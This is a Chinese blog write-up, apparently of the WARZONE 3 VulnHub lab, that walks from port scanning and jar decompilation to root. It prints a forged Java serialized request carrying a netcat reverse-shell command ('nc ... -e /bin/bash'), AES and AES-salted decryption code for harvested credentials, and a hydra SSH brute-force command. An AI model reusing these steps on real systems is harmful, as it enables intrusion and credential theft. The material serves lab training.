



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="X_T" href="http://n1h1l157.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="X_T" href="http://n1h1l157.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="X_T" href="http://n1h1l157.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="VULNHUB 41-50" />


<link rel="canonical" href="http://n1h1l157.github.io/2021/11/01/VULNHUB/147%20WARZONE3/">



  <title>
VULNHUB 47 WARZONE3 - VULNHUB |
Phut Hon = X_T = 天行健，君子以自强不息</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">VULNHUB 47 WARZONE3
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-11-01 00:00:00">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-11-01T00:00:00+08:00">2021-11-01</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>4.7k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>8 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Phut Hon</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/BYav6pSg8e1GqNH.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/IN5LOBHrAwVsnC4.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/8LkEDulrcA3wvsa.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/nNsjUzcTObfYtMa.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/vL1l7HIUp4ZPtYc.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/ukLG5BwF6jH1ONA.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/VULNHUB/" itemprop="item" rel="index" title="分类于 VULNHUB"><span itemprop="name">VULNHUB</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://n1h1l157.github.io/2021/11/01/VULNHUB/147%20WARZONE3/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content=".N1h1l157">
    <meta itemprop="description" content="天行健，君子以自强不息, 人生如逆旅，我亦是行人">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="X_T">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>靶机下载地址: <span class="exturl" data-url="aHR0cHM6Ly93d3cudnVsbmh1Yi5jb20vZW50cnkvd2Fyem9uZS0=">https://www.vulnhub.com/entry/warzone-</span> 3 - exogen,606/<br>
 教程链接地址: <span class="exturl" data-url="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kNGtLaV9najR2aw==">https://www.youtube.com/watch?v=d4kKi_gj4vk</span></p>
<h3 id="001-确认攻击目标的财产信息"><a class="markdownIt-Anchor" href="#001-确认攻击目标的财产信息">#</a> 001 确认攻击目标的财产信息</h3>
<p>攻击机 kali： 1 92.168. 0 .x (由于设置成了 DHCP、可能多变)<br>
 靶机 WARZONE 3 ：桥接于 1 92.168. 0 .1 的网卡，ip 未知</p>
<p>1 ）确定靶机 ip 地址和开放的端口<br>
由已至内网靶机所在主机 MAC 地址自动扫描靶机 ip<br>
sudo arp-scan -l | grep ‘a0’ | awk ‘{print $1,$2}’ | cut -d ’ ’ -f 1 | uniq<br>
 开靶机扫了一次，开靶机后扫了一次，得到靶机 ip 192.168.0.186</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1432.png" alt></p>
<h3 id="扫描靶机上开放的端口及详细信息"><a class="markdownIt-Anchor" href="#扫描靶机上开放的端口及详细信息">#</a> 扫描靶机上开放的端口及详细信息</h3>
<p>sudo nmap -sVC -T4 -Pn --open -p- 192.168.0.187 --min-rate=5000</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1433.png" alt></p>
<ul>
<li>sV 表示扫描服务及版本信息</li>
<li>sC 表示以默认的脚本进行扫描</li>
<li>T 4 表示控制扫描的速度</li>
<li>Pn 表示不用 ping 去扫描机器</li>
<li>-open 表示只扫描开放的端口</li>
<li>p- 表示扫描所有的端口</li>
<li>-min-rate 设置最小的扫描速度</li>
</ul>
<h3 id="检索到的有效服务如下所示"><a class="markdownIt-Anchor" href="#检索到的有效服务如下所示">#</a> 检索到的有效服务如下所示：</h3>
<p>21 ftp：可尝试进行匿名登陆下载文件<br>
 22 ssh：可尝试 ssh 爆破与一些对应版本漏洞利用<br>
 4444 krb 524 ：未知端口</p>
<h3 id="002-ftp匿名访问-jd-gui读jar文件sha-256-加密java解密"><a class="markdownIt-Anchor" href="#002-ftp匿名访问-jd-gui读jar文件sha-256-加密java解密">#</a> 002 ftp 匿名访问、jd-gui 读 jar 文件，SHA 256 加密，java 解密</h3>
<p>打开 <span class="exturl" data-url="ZnRwOi8vMTkyLjE2OC4wLjE4Ni8=">ftp://192.168.0.186/</span> 进行 ftp 信息收集<br>
有一个文件夹 pub、里边有一个 jar 文件和一个 txt 文件</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1434.png" alt></p>
<p>将 ftp 服务器里的这两个文件都下载到本地，可以在 ftp 命令行中使用 lcd 来<br>
控制本地的目录</p>
<p>note.txt 中提示 token 是 username 的 SHA 256 值<br>
并且有一个邮箱是 alienum@exogenesis，即用户为 alienum</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1435.png" alt></p>
<p>将下在后的 jar 文件，用 jd-gui 打开后查看源代码</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1436.png" alt></p>
<p>RE 有四个量，分别是 token，option，cmd，value，以及一些继承序列化和转<br>
变为字符串、get set 方法等</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1437.png" alt></p>
<p>Token 由 value 和 role 组成</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1438.png" alt></p>
<p>在 Starter 即主函数中找到了一个判断角色，当角色为 astronaut 时允许进入</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1439.png" alt></p>
<p>先将这个 jar 文件执行一下，弹出来一个登陆框，随意输入信息之后报错，识<br>
别不到 url 地址为 warzone.local</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1440.png" alt></p>
<p>改变本地 hosts 文件，修改其 DNS 解析地址为靶机 ip</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1441.png" alt></p>
<p>并同时将已知用户 alienum 的 SHA 256 值计算出来，此 SHA 256 值根据提示内容来<br>
说就应该是 alienum 用户的 TOKEN 值</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1442.png" alt></p>
<p>也可以根据 terminal 的命令来计算，在 kali 下输入如下命令即可计算 SHA 256<br>
echo -n “alienum” | shasum -a 256</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1443.png" alt></p>
<p>6c72561d26722d88896b520da9651aa24e9ae6eca82e6c8e68af720cf21377ec</p>
<p>再次用 alienum 用户和他的 token 登陆发现爆了错误</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1444.png" alt></p>
<p>在看到 java 源代码的时候，知道它执行了以个 CMd 的命令，现在我们已经可以<br>
绕过登陆并且又了 token 的值，可以写一个 java 文件执行任意命令，拿出 IDEA<br>
 其他的两个文件不变，主函数改为下面的代码</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1445.png" alt></p>
<p>package alien;</p>
<p>import java.io.IOException;<br>
import java.io.ObjectInputStream;<br>
import java.io.ObjectOutputStream;<br>
import java.net.Socket;</p>
<p>public class Starter {<br>
static Socket socket = null;<br>
static ObjectOutputStream os;<br>
static Token token;</p>
<p>public static void main(String[] args) throws IOException,<br>
ClassNotFoundException {<br>
socket = new Socket(“warzone.local”, 4444);<br>
os = new ObjectOutputStream(socket.getOutputStream());<br>
token = new<br>
Token(“6c72561d26722d88896b520da9651aa24e9ae6eca82e6c8e68af720cf21377ec”,<br>
“astronaut”);</p>
<p>RE list = new RE();<br>
list.setToken(token);<br>
list.setOption(“VIEW”);<br>
list.setValue(“VALUE”);<br>
list.setCmd(“nc 192.168.0.168 4444 -e /bin/bash”);</p>
<p>os.writeObject(list);<br>
ObjectInputStream is = new ObjectInputStream(socket.getInputStream());<br>
RE response = (RE) is.readObject();<br>
os.close();<br>
socket.close();<br>
System.out.println(response.getValue());<br>
}<br>
}</p>
<p>执行之后 shell 成功反弹，拿到了 exomorph 的权限</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1446.png" alt></p>
<h3 id="003-jar反编译java脚本解密aessshpass命令行连接靶机"><a class="markdownIt-Anchor" href="#003-jar反编译java脚本解密aessshpass命令行连接靶机">#</a> 003 jar 反编译，java 脚本解密 AES，sshpass 命令行连接靶机</h3>
<p>标准化 tty 就不多说了<br>
 script -qc /bin/bash/dev/null<br>
stty raw -echo;fg<br>
export TERM=xterm;reset;stty rows 64 columns 118<br>
 此用户下有两个文件，cat 发现乱码，file 检查文件属性，strings 查看内容</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1447.png" alt></p>
<p>得到了一个密码，和一个 jar 文件，将 jar 文件拉到本地导入到 jd-gui</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1448.png" alt></p>
<p>CrypoException 是一个普通的类</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1449.png" alt></p>
<p>Cryptor 是一个 AES 加密文件，加密过程中会调用这个里边的方法</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1450.png" alt></p>
<p>Main 函数定义要加密的 key，以及加密后的文件的路径</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1451.png" alt></p>
<p>现在就用来写一个解密文件，用来将我们得到的密码 $:2Czq$(解密<br>
先定义解密函数，通过如下方法来调用<br>
 public static void decrypt (String key, File inputFile, File outputFile) throws<br>
CryptoException {<br>
doCrypto(Cipher.DECRYPT_MODE, key, inputFile, outputFile);<br>
}</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1452.png" alt></p>
<h3 id="再来修改主函数密钥维持不变修改当前的解密文件内容和解密后的文件保"><a class="markdownIt-Anchor" href="#再来修改主函数密钥维持不变修改当前的解密文件内容和解密后的文件保">#</a> 再来修改主函数，密钥维持不变，修改当前的解密文件内容和解密后的文件保</h3>
<h3 id="存路径并且调用解密方法最后将我们解密后的内容查看"><a class="markdownIt-Anchor" href="#存路径并且调用解密方法最后将我们解密后的内容查看">#</a> 存路径，并且调用解密方法，最后将我们解密后的内容查看</h3>
<p>package alienum;</p>
<p>import java.io.File;<br>
import java.io.IOException;</p>
<p>public class Main {<br>
static String inputPath =<br>
“/Users/chentuo/JavaProjects/alienum/aliens.encrypted”;</p>
<p>static String outputPath = “/Users/chentuo/JavaProjects/alienum/aliens.txt”;</p>
<p>public Main() {<br>
}</p>
<p>public static void main(String[] args) throws IOException,<br>
ClassNotFoundException {<br>
String key = “w4rz0nerex0gener”;<br>
File inputFile = new File(inputPath);<br>
File decryptedFile = new File(outputPath);</p>
<p>try {<br>
alienum.Cryptor.decrypt(key, inputFile, decryptedFile);<br>
} catch (CryptoException var5) {<br>
System.out.println(var5.getMessage());<br>
var5.printStackTrace();<br>
}</p>
<h3 id><a class="markdownIt-Anchor" href="#">#</a> }</h3>
<h3 id="-2"><a class="markdownIt-Anchor" href="#-2">#</a> }</h3>
<p><img data-src="/N1h1l157/VULNHUB/image-1453.png" alt></p>
<h3 id="运行此文件之后即可以在自己设置的目录下找到我们的解密文件但是这个解"><a class="markdownIt-Anchor" href="#运行此文件之后即可以在自己设置的目录下找到我们的解密文件但是这个解">#</a> 运行此文件之后，即可以在自己设置的目录下找到我们的解密文件，但是这个解</h3>
<p>密之后的 txt 文件不能用 cat 来查看会显示乱码，用 file 命令确定是一个 data<br>
 类型后，用 strings 查看得到了解密后的文件内容<br>
 minotaur:m1nom1no…<br>
scylla:scyscy…<br>
echidna:ech1ech1…</p>
<p>cyclops:cyccyc…<br>
anunnaki:nak1nak1…<br>
anunnaki:nak1nak2…<br>
anunnaki:nakinaki…</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1454.png" alt></p>
<p>得到了一串用户名和密码的组合，可能是 ssh 的用户和密码<br>
 cat aliens.txt | cut -d ‘:’ -f 1 &gt; user.txt<br>
cat aliens.txt | cut -d ‘:’ -f 2 &gt; pass.txt</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1455.png" alt></p>
<h3 id="检查一下用户名和密码文件是否正确"><a class="markdownIt-Anchor" href="#检查一下用户名和密码文件是否正确">#</a> 检查一下用户名和密码文件是否正确</h3>
<p><img data-src="/N1h1l157/VULNHUB/image-1456.png" alt><br>
<img data-src="/N1h1l157/VULNHUB/image-1457.png" alt></p>
<p>hydra -L user.txt -P pass.txt ssh://192.168.31.53 -f -t 32 -I -vV</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1458.png" alt><br>
<img data-src="/N1h1l157/VULNHUB/image-1459.png" alt></p>
<p>用 ssh 成功连接到了靶机中</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1460.png" alt></p>
<p>第一次登陆成功之后，第二次就可以用 sshpass 在命令行输入密码直接连接<br>
 sshpass -p nak1nak1… ssh <span class="exturl" data-url="bWFpbHRvOmFudW5uYWtpQDE5Mi4xNjguMC4xODY=">anunnaki@192.168.0.186</span></p>
<p><img data-src="/N1h1l157/VULNHUB/image-1461.png" alt></p>
<h3 id="004-gpg解密文件java源码分析编写java解密代码"><a class="markdownIt-Anchor" href="#004-gpg解密文件java源码分析编写java解密代码">#</a> 004 gpg 解密文件，java 源码分析，编写 java 解密代码</h3>
<p>检索服务器文件，看到提示文件与一个 gpg 的加密文件<br>
 info.txt 提示要用–batch 来解密 gpg 文件，否则不会让输入密码</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1462.png" alt></p>
<h3 id="然而直接解密是可以弹出来输入密码的界面的"><a class="markdownIt-Anchor" href="#然而直接解密是可以弹出来输入密码的界面的">#</a> 然而直接解密是可以弹出来输入密码的界面的，</h3>
<p>输入 ssh 爆破出来的密码 nak1nak1… 可以成功解密 gpg 为 jar 文件</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1463.png" alt></p>
<p>同样的下载到本地，用 jd-gui 打开，开始阅读源码<br>
 Cryptor.class 里边定义了一个加、解密方法</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1464.png" alt></p>
<p>Main.class 中设有盐值，并且在条件判断正确时为打印 passwd</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1465.png" alt></p>
<p>Recources.class 里边是一些加密的字符串</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1466.png" alt></p>
<p>编写 java 代码，进行解密，代码内容如下<br>
 import java.security.NoSuchAlgorithmException;<br>
import javax.crypto.BadPaddingException;<br>
import javax.crypto.IllegalBlockSizeException;<br>
import javax.crypto.NoSuchPaddingException;</p>
<p>public class Main {<br>
public static void main(String[] args) throws NoSuchPaddingException,<br>
IllegalBlockSizeException, NoSuchAlgorithmException, BadPaddingException {<br>
Cryptor cryptor = new Cryptor();</p>
<p>String plaintext = cryptor.decrypt(cryptor.decrypt(“pr0tect1on1smust”,<br>
“/aom7EHcuiCWzNArA72UVn0nnVtJ5jZSPHDmjFPc5KQ=”),<br>
“jJ2Mrz4wjZDMSPwDr6TolQ==”);<br>
System.out.println(&quot;[+] Success, the password is : &quot; + plaintext);</p>
<p>}</p>
<h3 id="-3"><a class="markdownIt-Anchor" href="#-3">#</a> }</h3>
<p><img data-src="/N1h1l157/VULNHUB/image-1467.png" alt></p>
<p>运行代码，成功解密出来了密码为 ufo_phosXEN</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1468.png" alt></p>
<p>判断一下这个密码属于哪个用户，发现就是 root 用户的</p>
<p><img data-src="/N1h1l157/VULNHUB/image-1469.png" alt></p>
<ul>
<li>-&gt; 成功拿到了 root 权限</li>
</ul>

      <div class="tags">
          <a href="/tags/VULNHUB-41-50/" rel="tag"><i class="ic i-tag"></i> VULNHUB 41-50</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-07-05 22:21:10" itemprop="dateModified" datetime="2023-07-05T22:21:10+08:00">2023-07-05</time>
  </span>
  <span id="2021/11/01/VULNHUB/147 WARZONE3/" class="item leancloud_visitors" data-flag-title="VULNHUB 47 WARZONE3" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt=".N1h1l157 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt=".N1h1l157 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt=".N1h1l157 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>.N1h1l157 <i class="ic i-at"><em>@</em></i>X_T
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://n1h1l157.github.io/2021/11/01/VULNHUB/147%20WARZONE3/" title="VULNHUB 47 WARZONE3">http://n1h1l157.github.io/2021/11/01/VULNHUB/147 WARZONE3/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/11/01/VULNHUB/149%20DURIAN/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;z4cW6UBjvtpaC8R.jpg" title="VULNHUB 49 DURIAN">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> VULNHUB</span>
  <h3>VULNHUB 49 DURIAN</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2021/11/01/VULNHUB/142%20DARKHOLE2/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;dQzT6Ao9rVLb1Zc.jpg" title="VULNHUB 42 DARKHOLE2">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> VULNHUB</span>
  <h3>VULNHUB 42 DARKHOLE2</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#001-%E7%A1%AE%E8%AE%A4%E6%94%BB%E5%87%BB%E7%9B%AE%E6%A0%87%E7%9A%84%E8%B4%A2%E4%BA%A7%E4%BF%A1%E6%81%AF"><span class="toc-number">1.</span> <span class="toc-text"> 001 确认攻击目标的财产信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E9%9D%B6%E6%9C%BA%E4%B8%8A%E5%BC%80%E6%94%BE%E7%9A%84%E7%AB%AF%E5%8F%A3%E5%8F%8A%E8%AF%A6%E7%BB%86%E4%BF%A1%E6%81%AF"><span class="toc-number">2.</span> <span class="toc-text"> 扫描靶机上开放的端口及详细信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A3%80%E7%B4%A2%E5%88%B0%E7%9A%84%E6%9C%89%E6%95%88%E6%9C%8D%E5%8A%A1%E5%A6%82%E4%B8%8B%E6%89%80%E7%A4%BA"><span class="toc-number">3.</span> <span class="toc-text"> 检索到的有效服务如下所示：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#002-ftp%E5%8C%BF%E5%90%8D%E8%AE%BF%E9%97%AE-jd-gui%E8%AF%BBjar%E6%96%87%E4%BB%B6sha-256-%E5%8A%A0%E5%AF%86java%E8%A7%A3%E5%AF%86"><span class="toc-number">4.</span> <span class="toc-text"> 002 ftp 匿名访问、jd-gui 读 jar 文件，SHA 256 加密，java 解密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#003-jar%E5%8F%8D%E7%BC%96%E8%AF%91java%E8%84%9A%E6%9C%AC%E8%A7%A3%E5%AF%86aessshpass%E5%91%BD%E4%BB%A4%E8%A1%8C%E8%BF%9E%E6%8E%A5%E9%9D%B6%E6%9C%BA"><span class="toc-number">5.</span> <span class="toc-text"> 003 jar 反编译，java 脚本解密 AES，sshpass 命令行连接靶机</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%8D%E6%9D%A5%E4%BF%AE%E6%94%B9%E4%B8%BB%E5%87%BD%E6%95%B0%E5%AF%86%E9%92%A5%E7%BB%B4%E6%8C%81%E4%B8%8D%E5%8F%98%E4%BF%AE%E6%94%B9%E5%BD%93%E5%89%8D%E7%9A%84%E8%A7%A3%E5%AF%86%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E5%92%8C%E8%A7%A3%E5%AF%86%E5%90%8E%E7%9A%84%E6%96%87%E4%BB%B6%E4%BF%9D"><span class="toc-number">6.</span> <span class="toc-text"> 再来修改主函数，密钥维持不变，修改当前的解密文件内容和解密后的文件保</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AD%98%E8%B7%AF%E5%BE%84%E5%B9%B6%E4%B8%94%E8%B0%83%E7%94%A8%E8%A7%A3%E5%AF%86%E6%96%B9%E6%B3%95%E6%9C%80%E5%90%8E%E5%B0%86%E6%88%91%E4%BB%AC%E8%A7%A3%E5%AF%86%E5%90%8E%E7%9A%84%E5%86%85%E5%AE%B9%E6%9F%A5%E7%9C%8B"><span class="toc-number">7.</span> <span class="toc-text"> 存路径，并且调用解密方法，最后将我们解密后的内容查看</span></a></li><li class="toc-item toc-level-3"><a class="toc-link"><span class="toc-number">8.</span> <span class="toc-text"> }</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#-2"><span class="toc-number">9.</span> <span class="toc-text"> }</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%90%E8%A1%8C%E6%AD%A4%E6%96%87%E4%BB%B6%E4%B9%8B%E5%90%8E%E5%8D%B3%E5%8F%AF%E4%BB%A5%E5%9C%A8%E8%87%AA%E5%B7%B1%E8%AE%BE%E7%BD%AE%E7%9A%84%E7%9B%AE%E5%BD%95%E4%B8%8B%E6%89%BE%E5%88%B0%E6%88%91%E4%BB%AC%E7%9A%84%E8%A7%A3%E5%AF%86%E6%96%87%E4%BB%B6%E4%BD%86%E6%98%AF%E8%BF%99%E4%B8%AA%E8%A7%A3"><span class="toc-number">10.</span> <span class="toc-text"> 运行此文件之后，即可以在自己设置的目录下找到我们的解密文件，但是这个解</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5%E4%B8%80%E4%B8%8B%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81%E6%96%87%E4%BB%B6%E6%98%AF%E5%90%A6%E6%AD%A3%E7%A1%AE"><span class="toc-number">11.</span> <span class="toc-text"> 检查一下用户名和密码文件是否正确</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#004-gpg%E8%A7%A3%E5%AF%86%E6%96%87%E4%BB%B6java%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%E7%BC%96%E5%86%99java%E8%A7%A3%E5%AF%86%E4%BB%A3%E7%A0%81"><span class="toc-number">12.</span> <span class="toc-text"> 004 gpg 解密文件，java 源码分析，编写 java 解密代码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%84%B6%E8%80%8C%E7%9B%B4%E6%8E%A5%E8%A7%A3%E5%AF%86%E6%98%AF%E5%8F%AF%E4%BB%A5%E5%BC%B9%E5%87%BA%E6%9D%A5%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81%E7%9A%84%E7%95%8C%E9%9D%A2%E7%9A%84"><span class="toc-number">13.</span> <span class="toc-text"> 然而直接解密是可以弹出来输入密码的界面的，</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#-3"><span class="toc-number">14.</span> <span class="toc-text"> }</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2021/11/01/VULNHUB/101%20EVM/" rel="bookmark" title="VULNHUB 1 EVM">VULNHUB 1 EVM</a></li><li><a href="/2021/11/01/VULNHUB/104%20BREAKOUT/" rel="bookmark" title="VULNHUB 4 BREAKOUT">VULNHUB 4 BREAKOUT</a></li><li><a href="/2021/11/01/VULNHUB/102%20NAPPING/" rel="bookmark" title="VULNHUB 2 NAPPING">VULNHUB 2 NAPPING</a></li><li><a href="/2021/11/01/VULNHUB/103%20HACKSUDO/" rel="bookmark" title="VULNHUB 3 HACKSUDO">VULNHUB 3 HACKSUDO</a></li><li><a href="/2021/11/01/VULNHUB/105%20EARTH/" rel="bookmark" title="VULNHUB 5 EARTH">VULNHUB 5 EARTH</a></li><li><a href="/2021/11/01/VULNHUB/107%20RECON/" rel="bookmark" title="VULNHUB 7 RECON">VULNHUB 7 RECON</a></li><li><a href="/2021/11/01/VULNHUB/106%20SYMFONOS/" rel="bookmark" title="VULNHUB 6 SYMFONOS">VULNHUB 6 SYMFONOS</a></li><li><a href="/2021/11/01/VULNHUB/110%20RED/" rel="bookmark" title="VULNHUB 10 RED">VULNHUB 10 RED</a></li><li><a href="/2021/11/01/VULNHUB/108%20MATRIX/" rel="bookmark" title="VULNHUB 8 MATRIX">VULNHUB 8 MATRIX</a></li><li><a href="/2021/11/01/VULNHUB/111%20DEATHNOTE/" rel="bookmark" title="VULNHUB 11 DEATHNOTE">VULNHUB 11 DEATHNOTE</a></li><li><a href="/2021/11/01/VULNHUB/109%20WALLABY/" rel="bookmark" title="VULNHUB 9 WALLABY">VULNHUB 9 WALLABY</a></li><li><a href="/2021/11/01/VULNHUB/112%20THOTH/" rel="bookmark" title="VULNHUB 12 THOTH">VULNHUB 12 THOTH</a></li><li><a href="/2021/11/01/VULNHUB/113%20CHRONOS/" rel="bookmark" title="VULNHUB 13 